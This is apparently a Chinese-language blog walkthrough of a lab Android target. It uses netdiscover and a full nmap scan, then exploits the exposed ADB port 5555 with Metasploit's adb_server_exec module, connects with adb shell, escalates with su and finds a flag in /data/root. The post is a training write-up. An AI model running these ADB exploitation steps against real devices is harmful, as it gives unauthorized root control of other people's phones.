今天给大家分享一个简单的Android漏洞环境测试靶场。
按照惯例,思路应该是:
1.扫描IP、端口; 2.攻击 3.获取shell 4.找flag
首先,我们扫描一波找到它的IP,这时候用netdiscover,很简单,怎么用看上一篇文章
https://www.it2021.com/penetration/421.html
然后我们断定192.168.0.49应该是Android虚拟机的ip
在nmap一波,
nmap -p 1-65535 -A 192.168.0.49
我们看到他开通5555/8080/22000
22000是ssh
那我们看看8080,如图,发现并没有什么卵用。
这时候,我们要考虑,搞一波5555端口。随之google一下。发现真的可以好好利用一下。
在Android系统中,TCP的5555旨在允许通过Android调试桥(ADB)管理设备,这是一种Android SDK功能,允许开发人员轻松地与设备通信并在其上运行命令或完全控制它们。
在kali下开启msfconsole,对adb模块测试一番
use exploit/android/adb/adb_server_exec show options #看下如何配置 set rhosts 192.168.0.49 #设置靶机地址 set lhost 192.168.0.167 #设置本机地址 run
已经成功了,这时候我们需要下载adb链接工具
apt-get install adb adb connect 192.168.0.49:5555 adb shell
成功了链接后,尝试了一下,发现可以su到root下,一顿乱翻。
在root下,目录/data/root目录下发现了flag
免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
评论